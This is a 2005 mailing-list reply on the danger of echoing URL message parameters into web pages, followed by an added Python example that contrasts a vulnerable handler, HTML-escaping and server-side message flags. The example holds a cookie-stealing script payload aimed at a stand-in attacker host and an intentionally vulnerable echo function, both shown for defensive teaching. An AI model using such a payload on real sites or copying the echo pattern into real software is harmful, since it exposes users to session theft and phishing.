On Wed, Feb 16, 2005 at 10:21:24AM -0500, Brett Sanger wrote:
> That's a bad idea, IMNSHO. Never pass anything as a parameter that will
> get displayed. That would open you up to attacks.
Good point.
> I could send people a link to your site that would email me all sorts of
> info (including cookies, which would let me attack their session). And
> anything I did would appear to be coming from your site.
Yes, but XSS-type attacks could be prevented by cleaning up the
message input. To me, the bigger problem would be controlling the actual
message which could be used to misguide the user. Your suggestion of
using flags is a good idea.
William
--
Knowmad Services Inc.
http://www.knowmad.com
---------------------------------------------------------------------
Web Archive: http://www.mail-archive.com/suppressed/
http://marc.theaimsgroup.com/?l=cgiapp&r=1&w=2
To unsubscribe, e-mail: suppressed
For additional commands, e-mail: suppressed
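The three positions in this exchange (echo the message, escape the message, pass only a flag) are shown side by side below. This is an added example, not code from the thread or from CGI::Application; it is written in Python rather than the Perl the list discusses because the pattern is the same in any CGI handler. The attacker inputs, the `MESSAGES` table and the `render_*` function names are all constructed for the illustration.

```python
import html
from urllib.parse import parse_qs, urlencode

# Constructed attacker inputs, modelled on the two problems raised in the thread:
# a script that ships the visitor's cookies to the attacker, and a plain-text
# message that contains no markup at all but misleads the reader.
SCRIPT_PAYLOAD = (
    "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"
)
PHISH_PAYLOAD = "Your session expired. Re-enter your password in the form below."

# The links an attacker would mail out: the parameter is URL-encoded so it
# survives the trip and is decoded back to the payload by the application.
SCRIPT_LINK = "?" + urlencode({"msg": SCRIPT_PAYLOAD})
PHISH_LINK = "?" + urlencode({"msg": PHISH_PAYLOAD})


def _param(query_string, name):
    """Return the first value of `name` from a query string ('' if absent)."""
    return parse_qs(query_string.lstrip("?")).get(name, [""])[0]


def render_vulnerable(query_string):
    """The pattern the thread warns against: echo the msg parameter into the page."""
    return "<p class='notice'>%s</p>" % _param(query_string, "msg")


def render_escaped(query_string):
    """First fix: HTML-escape the value. This blocks script injection, but the
    attacker still chooses every word the visitor sees under your site's name."""
    return "<p class='notice'>%s</p>" % html.escape(_param(query_string, "msg"), quote=True)


# Second fix (the 'flags' suggestion): the URL carries only a short code and the
# wording lives on the server, so the attacker can neither inject markup nor
# write the text. The table is hypothetical.
MESSAGES = {
    "saved": "Your changes have been saved.",
    "login_required": "Please log in to continue.",
    "bad_password": "Incorrect username or password.",
}


def render_flagged(query_string):
    """Look the flag up server-side; an unknown or tampered flag shows nothing."""
    text = MESSAGES.get(_param(query_string, "msg"))
    if text is None:
        return ""  # never fall back to displaying the raw parameter
    return "<p class='notice'>%s</p>" % html.escape(text)


if __name__ == "__main__":
    for link in (SCRIPT_LINK, PHISH_LINK, "?msg=saved"):
        print("link:      ", link)
        print("vulnerable:", render_vulnerable(link))
        print("escaped:   ", render_escaped(link))
        print("flagged:   ", render_flagged(link))
        print()
```

Running it shows why escaping alone does not settle the argument: `render_escaped` turns the script payload into harmless text, but it prints the phishing sentence verbatim, in the site's own notice box, whereas `render_flagged` prints nothing for either link and only ever shows wording the server defined.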